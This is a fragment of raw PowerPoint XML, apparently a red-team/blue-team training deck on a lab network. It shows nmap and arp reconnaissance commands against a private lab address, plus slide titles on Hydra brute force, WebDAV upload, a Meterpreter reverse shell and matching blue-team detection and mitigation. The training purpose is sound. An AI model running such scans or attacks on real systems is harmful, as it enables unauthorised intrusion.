              <a:ea typeface="Roboto"/>
              <a:cs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651450" y="643761"/>
            <a:ext cx="250485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‘a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rp a’ for local subnet details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‘nmap 192.168.1.0/24’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3. nmap –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sV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192.168.1.105.105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12" y="1968980"/>
            <a:ext cx="2874663" cy="1623122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;1092;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362548" y="1547479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228600" indent="-228600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Employ Console @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pentest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machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600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Nmap discovery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hosts on network and their open TCP ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600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nmap discovery of service and version per open TCP port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utoShape 2" descr="Index of I &#10;@ 192.168.1.105 &#10;Kali Linux Kali Training Kali Tools Kali Docs &#10;Index of / &#10;Kati Forums &#10;Last-modified Size Description &#10;O company-hlogl 2019-05-0718:23 &#10;company-foldersl 2019-05-0718:27 &#10;Ocompany-sharel 2019-05-0718:22 &#10;Omeet-our-teaml 2019-05-0718:34 &#10;Apache/2.4.29 (Ubuntu) Server at 192.168.1.105 Port 80 "/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="123825" y="-1935163"/>
            <a:ext cx="51816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2" y="3625107"/>
            <a:ext cx="2230468" cy="126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1498</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>339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Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin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 - contd</vt:lpstr>
      <vt:lpstr>Exploitation: Port Scan - nmap</vt:lpstr>
      <vt:lpstr>Exploitation: Hidden Directory Discovery - DirB</vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Attack - Hydra</vt:lpstr>
      <vt:lpstr>Exploitation: File upload /webdav</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan - nmap</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory - DirB</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack - Hydra </vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Reverse Shell Connection - Meterpreter</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan - nmap</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory - DirB</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks - Hydra</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection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Ben</dc:creator>
  <cp:lastModifiedBy>Ben</cp:lastModifiedBy>
  <cp:revision>222</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-19T12:47:18Z</dcterms:modified>
</cp:coreProperties>
</file>